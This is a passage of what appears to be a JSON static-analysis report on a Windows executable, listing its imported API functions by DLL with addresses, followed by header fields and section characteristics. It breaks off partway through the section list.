- "name": "LeaveCriticalSection",
- "address": "0x46f16c"
- },
- {
- "name": "EnterCriticalSection",
- "address": "0x46f170"
- },
- {
- "name": "InitializeCriticalSection",
- "address": "0x46f174"
- },
- {
- "name": "VirtualFree",
- "address": "0x46f178"
- },
- {
- "name": "VirtualAlloc",
- "address": "0x46f17c"
- },
- {
- "name": "LocalFree",
- "address": "0x46f180"
- },
- {
- "name": "LocalAlloc",
- "address": "0x46f184"
- },
- {
- "name": "GetVersion",
- "address": "0x46f188"
- },
- {
- "name": "GetCurrentThreadId",
- "address": "0x46f18c"
- },
- {
- "name": "InterlockedDecrement",
- "address": "0x46f190"
- },
- {
- "name": "InterlockedIncrement",
- "address": "0x46f194"
- },
- {
- "name": "VirtualQuery",
- "address": "0x46f198"
- },
- {
- "name": "WideCharToMultiByte",
- "address": "0x46f19c"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x46f1a0"
- },
- {
- "name": "lstrlenA",
- "address": "0x46f1a4"
- },
- {
- "name": "lstrcpynA",
- "address": "0x46f1a8"
- },
- {
- "name": "LoadLibraryExA",
- "address": "0x46f1ac"
- },
- {
- "name": "GetThreadLocale",
- "address": "0x46f1b0"
- },
- {
- "name": "GetStartupInfoA",
- "address": "0x46f1b4"
- },
- {
- "name": "GetProcAddress",
- "address": "0x46f1b8"
- },
- {
- "name": "GetModuleHandleA",
- "address": "0x46f1bc"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x46f1c0"
- },
- {
- "name": "GetLocaleInfoA",
- "address": "0x46f1c4"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x46f1c8"
- },
- {
- "name": "FreeLibrary",
- "address": "0x46f1cc"
- },
- {
- "name": "FindFirstFileA",
- "address": "0x46f1d0"
- },
- {
- "name": "FindClose",
- "address": "0x46f1d4"
- },
- {
- "name": "ExitProcess",
- "address": "0x46f1d8"
- },
- {
- "name": "WriteFile",
- "address": "0x46f1dc"
- },
- {
- "name": "UnhandledExceptionFilter",
- "address": "0x46f1e0"
- },
- {
- "name": "RtlUnwind",
- "address": "0x46f1e4"
- },
- {
- "name": "RaiseException",
- "address": "0x46f1e8"
- },
- {
- "name": "GetStdHandle",
- "address": "0x46f1ec"
- }
- ],
- "dll": "kernel32.dll"
- },
- {
- "imports": [
- {
- "name": "GetKeyboardType",
- "address": "0x46f1f4"
- },
- {
- "name": "LoadStringA",
- "address": "0x46f1f8"
- },
- {
- "name": "MessageBoxA",
- "address": "0x46f1fc"
- },
- {
- "name": "CharNextA",
- "address": "0x46f200"
- }
- ],
- "dll": "user32.dll"
- },
- {
- "imports": [
- {
- "name": "RegQueryValueExA",
- "address": "0x46f208"
- },
- {
- "name": "RegOpenKeyExA",
- "address": "0x46f20c"
- },
- {
- "name": "RegCloseKey",
- "address": "0x46f210"
- }
- ],
- "dll": "advapi32.dll"
- },
- {
- "imports": [
- {
- "name": "SysFreeString",
- "address": "0x46f218"
- },
- {
- "name": "SysReAllocStringLen",
- "address": "0x46f21c"
- },
- {
- "name": "SysAllocStringLen",
- "address": "0x46f220"
- }
- ],
- "dll": "oleaut32.dll"
- },
- {
- "imports": [
- {
- "name": "TlsSetValue",
- "address": "0x46f228"
- },
- {
- "name": "TlsGetValue",
- "address": "0x46f22c"
- },
- {
- "name": "LocalAlloc",
- "address": "0x46f230"
- },
- {
- "name": "GetModuleHandleA",
- "address": "0x46f234"
- }
- ],
- "dll": "kernel32.dll"
- },
- {
- "imports": [
- {
- "name": "RegQueryValueExA",
- "address": "0x46f23c"
- },
- {
- "name": "RegOpenKeyExA",
- "address": "0x46f240"
- },
- {
- "name": "RegCloseKey",
- "address": "0x46f244"
- }
- ],
- "dll": "advapi32.dll"
- },
- {
- "imports": [
- {
- "name": "lstrcpyA",
- "address": "0x46f24c"
- },
- {
- "name": "WriteFile",
- "address": "0x46f250"
- },
- {
- "name": "WaitForSingleObject",
- "address": "0x46f254"
- },
- {
- "name": "VirtualQuery",
- "address": "0x46f258"
- },
- {
- "name": "VirtualAlloc",
- "address": "0x46f25c"
- },
- {
- "name": "Sleep",
- "address": "0x46f260"
- },
- {
- "name": "SizeofResource",
- "address": "0x46f264"
- },
- {
- "name": "SetThreadLocale",
- "address": "0x46f268"
- },
- {
- "name": "SetFilePointer",
- "address": "0x46f26c"
- },
- {
- "name": "SetEvent",
- "address": "0x46f270"
- },
- {
- "name": "SetErrorMode",
- "address": "0x46f274"
- },
- {
- "name": "SetEndOfFile",
- "address": "0x46f278"
- },
- {
- "name": "ResetEvent",
- "address": "0x46f27c"
- },
- {
- "name": "ReadFile",
- "address": "0x46f280"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x46f284"
- },
- {
- "name": "MulDiv",
- "address": "0x46f288"
- },
- {
- "name": "LockResource",
- "address": "0x46f28c"
- },
- {
- "name": "LoadResource",
- "address": "0x46f290"
- },
- {
- "name": "LoadLibraryA",
- "address": "0x46f294"
- },
- {
- "name": "LeaveCriticalSection",
- "address": "0x46f298"
- },
- {
- "name": "InitializeCriticalSection",
- "address": "0x46f29c"
- },
- {
- "name": "GlobalUnlock",
- "address": "0x46f2a0"
- },
- {
- "name": "GlobalSize",
- "address": "0x46f2a4"
- },
- {
- "name": "GlobalReAlloc",
- "address": "0x46f2a8"
- },
- {
- "name": "GlobalHandle",
- "address": "0x46f2ac"
- },
- {
- "name": "GlobalLock",
- "address": "0x46f2b0"
- },
- {
- "name": "GlobalFree",
- "address": "0x46f2b4"
- },
- {
- "name": "GlobalFindAtomA",
- "address": "0x46f2b8"
- },
- {
- "name": "GlobalDeleteAtom",
- "address": "0x46f2bc"
- },
- {
- "name": "GlobalAlloc",
- "address": "0x46f2c0"
- },
- {
- "name": "GlobalAddAtomA",
- "address": "0x46f2c4"
- },
- {
- "name": "GetVersionExA",
- "address": "0x46f2c8"
- },
- {
- "name": "GetVersion",
- "address": "0x46f2cc"
- },
- {
- "name": "GetUserDefaultLCID",
- "address": "0x46f2d0"
- },
- {
- "name": "GetTickCount",
- "address": "0x46f2d4"
- },
- {
- "name": "GetThreadLocale",
- "address": "0x46f2d8"
- },
- {
- "name": "GetSystemInfo",
- "address": "0x46f2dc"
- },
- {
- "name": "GetStringTypeExA",
- "address": "0x46f2e0"
- },
- {
- "name": "GetStdHandle",
- "address": "0x46f2e4"
- },
- {
- "name": "GetProfileStringA",
- "address": "0x46f2e8"
- },
- {
- "name": "GetProcAddress",
- "address": "0x46f2ec"
- },
- {
- "name": "GetModuleHandleA",
- "address": "0x46f2f0"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x46f2f4"
- },
- {
- "name": "GetLocaleInfoA",
- "address": "0x46f2f8"
- },
- {
- "name": "GetLocalTime",
- "address": "0x46f2fc"
- },
- {
- "name": "GetLastError",
- "address": "0x46f300"
- },
- {
- "name": "GetFullPathNameA",
- "address": "0x46f304"
- },
- {
- "name": "GetDiskFreeSpaceA",
- "address": "0x46f308"
- },
- {
- "name": "GetDateFormatA",
- "address": "0x46f30c"
- },
- {
- "name": "GetCurrentThreadId",
- "address": "0x46f310"
- },
- {
- "name": "GetCurrentProcessId",
- "address": "0x46f314"
- },
- {
- "name": "GetComputerNameA",
- "address": "0x46f318"
- },
- {
- "name": "GetCPInfo",
- "address": "0x46f31c"
- },
- {
- "name": "GetACP",
- "address": "0x46f320"
- },
- {
- "name": "FreeResource",
- "address": "0x46f324"
- },
- {
- "name": "InterlockedExchange",
- "address": "0x46f328"
- },
- {
- "name": "FreeLibrary",
- "address": "0x46f32c"
- },
- {
- "name": "FormatMessageA",
- "address": "0x46f330"
- },
- {
- "name": "FindResourceA",
- "address": "0x46f334"
- },
- {
- "name": "EnumCalendarInfoA",
- "address": "0x46f338"
- },
- {
- "name": "EnterCriticalSection",
- "address": "0x46f33c"
- },
- {
- "name": "DeleteCriticalSection",
- "address": "0x46f340"
- },
- {
- "name": "CreateThread",
- "address": "0x46f344"
- },
- {
- "name": "CreateFileA",
- "address": "0x46f348"
- },
- {
- "name": "CreateEventA",
- "address": "0x46f34c"
- },
- {
- "name": "CompareStringA",
- "address": "0x46f350"
- },
- {
- "name": "CloseHandle",
- "address": "0x46f354"
- }
- ],
- "dll": "kernel32.dll"
- },
- {
- "imports": [
- {
- "name": "VerQueryValueA",
- "address": "0x46f35c"
- },
- {
- "name": "GetFileVersionInfoSizeA",
- "address": "0x46f360"
- },
- {
- "name": "GetFileVersionInfoA",
- "address": "0x46f364"
- }
- ],
- "dll": "version.dll"
- },
- {
- "imports": [
- {
- "name": "UnrealizeObject",
- "address": "0x46f36c"
- },
- {
- "name": "StretchBlt",
- "address": "0x46f370"
- },
- {
- "name": "SetWindowOrgEx",
- "address": "0x46f374"
- },
- {
- "name": "SetWinMetaFileBits",
- "address": "0x46f378"
- },
- {
- "name": "SetViewportOrgEx",
- "address": "0x46f37c"
- },
- {
- "name": "SetTextColor",
- "address": "0x46f380"
- },
- {
- "name": "SetStretchBltMode",
- "address": "0x46f384"
- },
- {
- "name": "SetROP2",
- "address": "0x46f388"
- },
- {
- "name": "SetPixel",
- "address": "0x46f38c"
- },
- {
- "name": "SetMapMode",
- "address": "0x46f390"
- },
- {
- "name": "SetEnhMetaFileBits",
- "address": "0x46f394"
- },
- {
- "name": "SetDIBColorTable",
- "address": "0x46f398"
- },
- {
- "name": "SetBrushOrgEx",
- "address": "0x46f39c"
- },
- {
- "name": "SetBkMode",
- "address": "0x46f3a0"
- },
- {
- "name": "SetBkColor",
- "address": "0x46f3a4"
- },
- {
- "name": "SelectPalette",
- "address": "0x46f3a8"
- },
- {
- "name": "SelectObject",
- "address": "0x46f3ac"
- },
- {
- "name": "SelectClipRgn",
- "address": "0x46f3b0"
- },
- {
- "name": "ScaleWindowExtEx",
- "address": "0x46f3b4"
- },
- {
- "name": "SaveDC",
- "address": "0x46f3b8"
- },
- {
- "name": "RestoreDC",
- "address": "0x46f3bc"
- },
- {
- "name": "RectVisible",
- "address": "0x46f3c0"
- },
- {
- "name": "RealizePalette",
- "address": "0x46f3c4"
- },
- {
- "name": "PlayEnhMetaFile",
- "address": "0x46f3c8"
- },
- {
- "name": "PathToRegion",
- "address": "0x46f3cc"
- },
- {
- "name": "PatBlt",
- "address": "0x46f3d0"
- },
- {
- "name": "MoveToEx",
- "address": "0x46f3d4"
- },
- {
- "name": "MaskBlt",
- "address": "0x46f3d8"
- },
- {
- "name": "LineTo",
- "address": "0x46f3dc"
- },
- {
- "name": "LPtoDP",
- "address": "0x46f3e0"
- },
- {
- "name": "IntersectClipRect",
- "address": "0x46f3e4"
- },
- {
- "name": "GetWindowOrgEx",
- "address": "0x46f3e8"
- },
- {
- "name": "GetWinMetaFileBits",
- "address": "0x46f3ec"
- },
- {
- "name": "GetTextMetricsA",
- "address": "0x46f3f0"
- },
- {
- "name": "GetTextExtentPoint32A",
- "address": "0x46f3f4"
- },
- {
- "name": "GetSystemPaletteEntries",
- "address": "0x46f3f8"
- },
- {
- "name": "GetStockObject",
- "address": "0x46f3fc"
- },
- {
- "name": "GetPixel",
- "address": "0x46f400"
- },
- {
- "name": "GetPaletteEntries",
- "address": "0x46f404"
- },
- {
- "name": "GetObjectA",
- "address": "0x46f408"
- },
- {
- "name": "GetEnhMetaFilePaletteEntries",
- "address": "0x46f40c"
- },
- {
- "name": "GetEnhMetaFileHeader",
- "address": "0x46f410"
- },
- {
- "name": "GetEnhMetaFileDescriptionA",
- "address": "0x46f414"
- },
- {
- "name": "GetEnhMetaFileBits",
- "address": "0x46f418"
- },
- {
- "name": "GetDeviceCaps",
- "address": "0x46f41c"
- },
- {
- "name": "GetDIBits",
- "address": "0x46f420"
- },
- {
- "name": "GetDIBColorTable",
- "address": "0x46f424"
- },
- {
- "name": "GetDCOrgEx",
- "address": "0x46f428"
- },
- {
- "name": "GetCurrentPositionEx",
- "address": "0x46f42c"
- },
- {
- "name": "GetClipBox",
- "address": "0x46f430"
- },
- {
- "name": "GetBrushOrgEx",
- "address": "0x46f434"
- },
- {
- "name": "GetBitmapBits",
- "address": "0x46f438"
- },
- {
- "name": "ExcludeClipRect",
- "address": "0x46f43c"
- },
- {
- "name": "EndPage",
- "address": "0x46f440"
- },
- {
- "name": "EndDoc",
- "address": "0x46f444"
- },
- {
- "name": "DeleteObject",
- "address": "0x46f448"
- },
- {
- "name": "DeleteEnhMetaFile",
- "address": "0x46f44c"
- },
- {
- "name": "DeleteDC",
- "address": "0x46f450"
- },
- {
- "name": "CreateSolidBrush",
- "address": "0x46f454"
- },
- {
- "name": "CreatePenIndirect",
- "address": "0x46f458"
- },
- {
- "name": "CreatePalette",
- "address": "0x46f45c"
- },
- {
- "name": "CreateICA",
- "address": "0x46f460"
- },
- {
- "name": "CreateHalftonePalette",
- "address": "0x46f464"
- },
- {
- "name": "CreateFontIndirectA",
- "address": "0x46f468"
- },
- {
- "name": "CreateEnhMetaFileA",
- "address": "0x46f46c"
- },
- {
- "name": "CreateDIBitmap",
- "address": "0x46f470"
- },
- {
- "name": "CreateDIBSection",
- "address": "0x46f474"
- },
- {
- "name": "CreateDCA",
- "address": "0x46f478"
- },
- {
- "name": "CreateCompatibleDC",
- "address": "0x46f47c"
- },
- {
- "name": "CreateCompatibleBitmap",
- "address": "0x46f480"
- },
- {
- "name": "CreateBrushIndirect",
- "address": "0x46f484"
- },
- {
- "name": "CreateBitmap",
- "address": "0x46f488"
- },
- {
- "name": "CopyEnhMetaFileA",
- "address": "0x46f48c"
- },
- {
- "name": "CloseEnhMetaFile",
- "address": "0x46f490"
- },
- {
- "name": "BitBlt",
- "address": "0x46f494"
- }
- ],
- "dll": "gdi32.dll"
- },
- {
- "imports": [
- {
- "name": "CreateWindowExA",
- "address": "0x46f49c"
- },
- {
- "name": "WindowFromPoint",
- "address": "0x46f4a0"
- },
- {
- "name": "WinHelpA",
- "address": "0x46f4a4"
- },
- {
- "name": "WaitMessage",
- "address": "0x46f4a8"
- },
- {
- "name": "UpdateWindow",
- "address": "0x46f4ac"
- },
- {
- "name": "UnregisterClassA",
- "address": "0x46f4b0"
- },
- {
- "name": "UnhookWindowsHookEx",
- "address": "0x46f4b4"
- },
- {
- "name": "TranslateMessage",
- "address": "0x46f4b8"
- },
- {
- "name": "TranslateMDISysAccel",
- "address": "0x46f4bc"
- },
- {
- "name": "TrackPopupMenu",
- "address": "0x46f4c0"
- },
- {
- "name": "SystemParametersInfoA",
- "address": "0x46f4c4"
- },
- {
- "name": "ShowWindow",
- "address": "0x46f4c8"
- },
- {
- "name": "ShowScrollBar",
- "address": "0x46f4cc"
- },
- {
- "name": "ShowOwnedPopups",
- "address": "0x46f4d0"
- },
- {
- "name": "ShowCursor",
- "address": "0x46f4d4"
- },
- {
- "name": "SetWindowsHookExA",
- "address": "0x46f4d8"
- },
- {
- "name": "SetWindowTextA",
- "address": "0x46f4dc"
- },
- {
- "name": "SetWindowPos",
- "address": "0x46f4e0"
- },
- {
- "name": "SetWindowPlacement",
- "address": "0x46f4e4"
- },
- {
- "name": "SetWindowLongA",
- "address": "0x46f4e8"
- },
- {
- "name": "SetTimer",
- "address": "0x46f4ec"
- },
- {
- "name": "SetScrollRange",
- "address": "0x46f4f0"
- },
- {
- "name": "SetScrollPos",
- "address": "0x46f4f4"
- },
- {
- "name": "SetScrollInfo",
- "address": "0x46f4f8"
- },
- {
- "name": "SetRect",
- "address": "0x46f4fc"
- },
- {
- "name": "SetPropA",
- "address": "0x46f500"
- },
- {
- "name": "SetParent",
- "address": "0x46f504"
- },
- {
- "name": "SetMenuItemInfoA",
- "address": "0x46f508"
- },
- {
- "name": "SetMenu",
- "address": "0x46f50c"
- },
- {
- "name": "SetKeyboardState",
- "address": "0x46f510"
- },
- {
- "name": "SetForegroundWindow",
- "address": "0x46f514"
- },
- {
- "name": "SetFocus",
- "address": "0x46f518"
- },
- {
- "name": "SetCursor",
- "address": "0x46f51c"
- },
- {
- "name": "SetClipboardData",
- "address": "0x46f520"
- },
- {
- "name": "SetClassLongA",
- "address": "0x46f524"
- },
- {
- "name": "SetCapture",
- "address": "0x46f528"
- },
- {
- "name": "SetActiveWindow",
- "address": "0x46f52c"
- },
- {
- "name": "SendMessageA",
- "address": "0x46f530"
- },
- {
- "name": "ScrollWindow",
- "address": "0x46f534"
- },
- {
- "name": "ScreenToClient",
- "address": "0x46f538"
- },
- {
- "name": "RemovePropA",
- "address": "0x46f53c"
- },
- {
- "name": "RemoveMenu",
- "address": "0x46f540"
- },
- {
- "name": "ReleaseDC",
- "address": "0x46f544"
- },
- {
- "name": "ReleaseCapture",
- "address": "0x46f548"
- },
- {
- "name": "RegisterWindowMessageA",
- "address": "0x46f54c"
- },
- {
- "name": "RegisterClipboardFormatA",
- "address": "0x46f550"
- },
- {
- "name": "RegisterClassA",
- "address": "0x46f554"
- },
- {
- "name": "RedrawWindow",
- "address": "0x46f558"
- },
- {
- "name": "PtInRect",
- "address": "0x46f55c"
- },
- {
- "name": "PostQuitMessage",
- "address": "0x46f560"
- },
- {
- "name": "PostMessageA",
- "address": "0x46f564"
- },
- {
- "name": "PeekMessageA",
- "address": "0x46f568"
- },
- {
- "name": "OpenClipboard",
- "address": "0x46f56c"
- },
- {
- "name": "OffsetRect",
- "address": "0x46f570"
- },
- {
- "name": "OemToCharA",
- "address": "0x46f574"
- },
- {
- "name": "MessageBoxA",
- "address": "0x46f578"
- },
- {
- "name": "MessageBeep",
- "address": "0x46f57c"
- },
- {
- "name": "MapWindowPoints",
- "address": "0x46f580"
- },
- {
- "name": "MapVirtualKeyA",
- "address": "0x46f584"
- },
- {
- "name": "LoadStringA",
- "address": "0x46f588"
- },
- {
- "name": "LoadKeyboardLayoutA",
- "address": "0x46f58c"
- },
- {
- "name": "LoadIconA",
- "address": "0x46f590"
- },
- {
- "name": "LoadCursorA",
- "address": "0x46f594"
- },
- {
- "name": "LoadBitmapA",
- "address": "0x46f598"
- },
- {
- "name": "KillTimer",
- "address": "0x46f59c"
- },
- {
- "name": "IsZoomed",
- "address": "0x46f5a0"
- },
- {
- "name": "IsWindowVisible",
- "address": "0x46f5a4"
- },
- {
- "name": "IsWindowEnabled",
- "address": "0x46f5a8"
- },
- {
- "name": "IsWindow",
- "address": "0x46f5ac"
- },
- {
- "name": "IsRectEmpty",
- "address": "0x46f5b0"
- },
- {
- "name": "IsIconic",
- "address": "0x46f5b4"
- },
- {
- "name": "IsDialogMessageA",
- "address": "0x46f5b8"
- },
- {
- "name": "IsChild",
- "address": "0x46f5bc"
- },
- {
- "name": "IsCharAlphaNumericA",
- "address": "0x46f5c0"
- },
- {
- "name": "IsCharAlphaA",
- "address": "0x46f5c4"
- },
- {
- "name": "InvalidateRect",
- "address": "0x46f5c8"
- },
- {
- "name": "IntersectRect",
- "address": "0x46f5cc"
- },
- {
- "name": "InsertMenuItemA",
- "address": "0x46f5d0"
- },
- {
- "name": "InsertMenuA",
- "address": "0x46f5d4"
- },
- {
- "name": "InflateRect",
- "address": "0x46f5d8"
- },
- {
- "name": "GetWindowThreadProcessId",
- "address": "0x46f5dc"
- },
- {
- "name": "GetWindowTextA",
- "address": "0x46f5e0"
- },
- {
- "name": "GetWindowRect",
- "address": "0x46f5e4"
- },
- {
- "name": "GetWindowPlacement",
- "address": "0x46f5e8"
- },
- {
- "name": "GetWindowLongA",
- "address": "0x46f5ec"
- },
- {
- "name": "GetWindowDC",
- "address": "0x46f5f0"
- },
- {
- "name": "GetTopWindow",
- "address": "0x46f5f4"
- },
- {
- "name": "GetSystemMetrics",
- "address": "0x46f5f8"
- },
- {
- "name": "GetSystemMenu",
- "address": "0x46f5fc"
- },
- {
- "name": "GetSysColorBrush",
- "address": "0x46f600"
- },
- {
- "name": "GetSysColor",
- "address": "0x46f604"
- },
- {
- "name": "GetSubMenu",
- "address": "0x46f608"
- },
- {
- "name": "GetScrollRange",
- "address": "0x46f60c"
- },
- {
- "name": "GetScrollPos",
- "address": "0x46f610"
- },
- {
- "name": "GetScrollInfo",
- "address": "0x46f614"
- },
- {
- "name": "GetPropA",
- "address": "0x46f618"
- },
- {
- "name": "GetParent",
- "address": "0x46f61c"
- },
- {
- "name": "GetWindow",
- "address": "0x46f620"
- },
- {
- "name": "GetMessageTime",
- "address": "0x46f624"
- },
- {
- "name": "GetMenuStringA",
- "address": "0x46f628"
- },
- {
- "name": "GetMenuState",
- "address": "0x46f62c"
- },
- {
- "name": "GetMenuItemInfoA",
- "address": "0x46f630"
- },
- {
- "name": "GetMenuItemID",
- "address": "0x46f634"
- },
- {
- "name": "GetMenuItemCount",
- "address": "0x46f638"
- },
- {
- "name": "GetMenu",
- "address": "0x46f63c"
- },
- {
- "name": "GetLastActivePopup",
- "address": "0x46f640"
- },
- {
- "name": "GetKeyboardState",
- "address": "0x46f644"
- },
- {
- "name": "GetKeyboardLayoutList",
- "address": "0x46f648"
- },
- {
- "name": "GetKeyboardLayout",
- "address": "0x46f64c"
- },
- {
- "name": "GetKeyState",
- "address": "0x46f650"
- },
- {
- "name": "GetKeyNameTextA",
- "address": "0x46f654"
- },
- {
- "name": "GetIconInfo",
- "address": "0x46f658"
- },
- {
- "name": "GetForegroundWindow",
- "address": "0x46f65c"
- },
- {
- "name": "GetFocus",
- "address": "0x46f660"
- },
- {
- "name": "GetDesktopWindow",
- "address": "0x46f664"
- },
- {
- "name": "GetDCEx",
- "address": "0x46f668"
- },
- {
- "name": "GetDC",
- "address": "0x46f66c"
- },
- {
- "name": "GetCursorPos",
- "address": "0x46f670"
- },
- {
- "name": "GetCursor",
- "address": "0x46f674"
- },
- {
- "name": "GetClipboardData",
- "address": "0x46f678"
- },
- {
- "name": "GetClientRect",
- "address": "0x46f67c"
- },
- {
- "name": "GetClassNameA",
- "address": "0x46f680"
- },
- {
- "name": "GetClassInfoA",
- "address": "0x46f684"
- },
- {
- "name": "GetCapture",
- "address": "0x46f688"
- },
- {
- "name": "GetActiveWindow",
- "address": "0x46f68c"
- },
- {
- "name": "FrameRect",
- "address": "0x46f690"
- },
- {
- "name": "FindWindowA",
- "address": "0x46f694"
- },
- {
- "name": "FillRect",
- "address": "0x46f698"
- },
- {
- "name": "EqualRect",
- "address": "0x46f69c"
- },
- {
- "name": "EnumWindows",
- "address": "0x46f6a0"
- },
- {
- "name": "EnumThreadWindows",
- "address": "0x46f6a4"
- },
- {
- "name": "EnumClipboardFormats",
- "address": "0x46f6a8"
- },
- {
- "name": "EndPaint",
- "address": "0x46f6ac"
- },
- {
- "name": "EndDeferWindowPos",
- "address": "0x46f6b0"
- },
- {
- "name": "EnableWindow",
- "address": "0x46f6b4"
- },
- {
- "name": "EnableScrollBar",
- "address": "0x46f6b8"
- },
- {
- "name": "EnableMenuItem",
- "address": "0x46f6bc"
- },
- {
- "name": "EmptyClipboard",
- "address": "0x46f6c0"
- },
- {
- "name": "DrawTextA",
- "address": "0x46f6c4"
- },
- {
- "name": "DrawMenuBar",
- "address": "0x46f6c8"
- },
- {
- "name": "DrawIconEx",
- "address": "0x46f6cc"
- },
- {
- "name": "DrawIcon",
- "address": "0x46f6d0"
- },
- {
- "name": "DrawFrameControl",
- "address": "0x46f6d4"
- },
- {
- "name": "DrawEdge",
- "address": "0x46f6d8"
- },
- {
- "name": "DispatchMessageA",
- "address": "0x46f6dc"
- },
- {
- "name": "DestroyWindow",
- "address": "0x46f6e0"
- },
- {
- "name": "DestroyMenu",
- "address": "0x46f6e4"
- },
- {
- "name": "DestroyIcon",
- "address": "0x46f6e8"
- },
- {
- "name": "DestroyCursor",
- "address": "0x46f6ec"
- },
- {
- "name": "DeleteMenu",
- "address": "0x46f6f0"
- },
- {
- "name": "DeferWindowPos",
- "address": "0x46f6f4"
- },
- {
- "name": "DefWindowProcA",
- "address": "0x46f6f8"
- },
- {
- "name": "DefMDIChildProcA",
- "address": "0x46f6fc"
- },
- {
- "name": "DefFrameProcA",
- "address": "0x46f700"
- },
- {
- "name": "CreatePopupMenu",
- "address": "0x46f704"
- },
- {
- "name": "CreateMenu",
- "address": "0x46f708"
- },
- {
- "name": "CreateIcon",
- "address": "0x46f70c"
- },
- {
- "name": "CloseClipboard",
- "address": "0x46f710"
- },
- {
- "name": "ClientToScreen",
- "address": "0x46f714"
- },
- {
- "name": "CheckMenuItem",
- "address": "0x46f718"
- },
- {
- "name": "CallWindowProcA",
- "address": "0x46f71c"
- },
- {
- "name": "CallNextHookEx",
- "address": "0x46f720"
- },
- {
- "name": "BeginPaint",
- "address": "0x46f724"
- },
- {
- "name": "BeginDeferWindowPos",
- "address": "0x46f728"
- },
- {
- "name": "CharNextA",
- "address": "0x46f72c"
- },
- {
- "name": "CharLowerBuffA",
- "address": "0x46f730"
- },
- {
- "name": "CharLowerA",
- "address": "0x46f734"
- },
- {
- "name": "CharUpperBuffA",
- "address": "0x46f738"
- },
- {
- "name": "CharToOemA",
- "address": "0x46f73c"
- },
- {
- "name": "AdjustWindowRectEx",
- "address": "0x46f740"
- },
- {
- "name": "ActivateKeyboardLayout",
- "address": "0x46f744"
- }
- ],
- "dll": "user32.dll"
- },
- {
- "imports": [
- {
- "name": "Sleep",
- "address": "0x46f74c"
- }
- ],
- "dll": "kernel32.dll"
- },
- {
- "imports": [
- {
- "name": "SafeArrayPtrOfIndex",
- "address": "0x46f754"
- },
- {
- "name": "SafeArrayGetUBound",
- "address": "0x46f758"
- },
- {
- "name": "SafeArrayGetLBound",
- "address": "0x46f75c"
- },
- {
- "name": "SafeArrayCreate",
- "address": "0x46f760"
- },
- {
- "name": "VariantChangeType",
- "address": "0x46f764"
- },
- {
- "name": "VariantCopy",
- "address": "0x46f768"
- },
- {
- "name": "VariantClear",
- "address": "0x46f76c"
- },
- {
- "name": "VariantInit",
- "address": "0x46f770"
- }
- ],
- "dll": "oleaut32.dll"
- },
- {
- "imports": [
- {
- "name": "CreateStreamOnHGlobal",
- "address": "0x46f778"
- },
- {
- "name": "IsAccelerator",
- "address": "0x46f77c"
- },
- {
- "name": "OleDraw",
- "address": "0x46f780"
- },
- {
- "name": "OleSetMenuDescriptor",
- "address": "0x46f784"
- },
- {
- "name": "CoTaskMemFree",
- "address": "0x46f788"
- },
- {
- "name": "ProgIDFromCLSID",
- "address": "0x46f78c"
- },
- {
- "name": "StringFromCLSID",
- "address": "0x46f790"
- },
- {
- "name": "CoCreateInstance",
- "address": "0x46f794"
- },
- {
- "name": "CoGetClassObject",
- "address": "0x46f798"
- },
- {
- "name": "CoUninitialize",
- "address": "0x46f79c"
- },
- {
- "name": "CoInitialize",
- "address": "0x46f7a0"
- },
- {
- "name": "IsEqualGUID",
- "address": "0x46f7a4"
- }
- ],
- "dll": "ole32.dll"
- },
- {
- "imports": [
- {
- "name": "GetErrorInfo",
- "address": "0x46f7ac"
- },
- {
- "name": "GetActiveObject",
- "address": "0x46f7b0"
- },
- {
- "name": "SysFreeString",
- "address": "0x46f7b4"
- }
- ],
- "dll": "oleaut32.dll"
- },
- {
- "imports": [
- {
- "name": "ImageList_SetIconSize",
- "address": "0x46f7bc"
- },
- {
- "name": "ImageList_GetIconSize",
- "address": "0x46f7c0"
- },
- {
- "name": "ImageList_Write",
- "address": "0x46f7c4"
- },
- {
- "name": "ImageList_Read",
- "address": "0x46f7c8"
- },
- {
- "name": "ImageList_GetDragImage",
- "address": "0x46f7cc"
- },
- {
- "name": "ImageList_DragShowNolock",
- "address": "0x46f7d0"
- },
- {
- "name": "ImageList_SetDragCursorImage",
- "address": "0x46f7d4"
- },
- {
- "name": "ImageList_DragMove",
- "address": "0x46f7d8"
- },
- {
- "name": "ImageList_DragLeave",
- "address": "0x46f7dc"
- },
- {
- "name": "ImageList_DragEnter",
- "address": "0x46f7e0"
- },
- {
- "name": "ImageList_EndDrag",
- "address": "0x46f7e4"
- },
- {
- "name": "ImageList_BeginDrag",
- "address": "0x46f7e8"
- },
- {
- "name": "ImageList_Remove",
- "address": "0x46f7ec"
- },
- {
- "name": "ImageList_DrawEx",
- "address": "0x46f7f0"
- },
- {
- "name": "ImageList_Draw",
- "address": "0x46f7f4"
- },
- {
- "name": "ImageList_GetBkColor",
- "address": "0x46f7f8"
- },
- {
- "name": "ImageList_SetBkColor",
- "address": "0x46f7fc"
- },
- {
- "name": "ImageList_ReplaceIcon",
- "address": "0x46f800"
- },
- {
- "name": "ImageList_Add",
- "address": "0x46f804"
- },
- {
- "name": "ImageList_GetImageCount",
- "address": "0x46f808"
- },
- {
- "name": "ImageList_Destroy",
- "address": "0x46f80c"
- },
- {
- "name": "ImageList_Create",
- "address": "0x46f810"
- }
- ],
- "dll": "comctl32.dll"
- },
- {
- "imports": [
- {
- "name": "OpenPrinterA",
- "address": "0x46f818"
- },
- {
- "name": "EnumPrintersA",
- "address": "0x46f81c"
- },
- {
- "name": "DocumentPropertiesA",
- "address": "0x46f820"
- },
- {
- "name": "ClosePrinter",
- "address": "0x46f824"
- }
- ],
- "dll": "winspool.drv"
- },
- {
- "imports": [
- {
- "name": "PrintDlgA",
- "address": "0x46f82c"
- }
- ],
- "dll": "comdlg32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x0009ba71",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x00000000",
- "icon_hash": null,
- "entrypoint": "0x0046304c",
- "timestamp": "1992-03-02 14:59:08",
- "osversion": "4.0",
- "sections": [
- {
- "name": "CODE",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00062200",
- "entropy": "6.54",
- "raw_address": "0x00000400",
- "virtual_size": "0x00062094",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": "DATA",
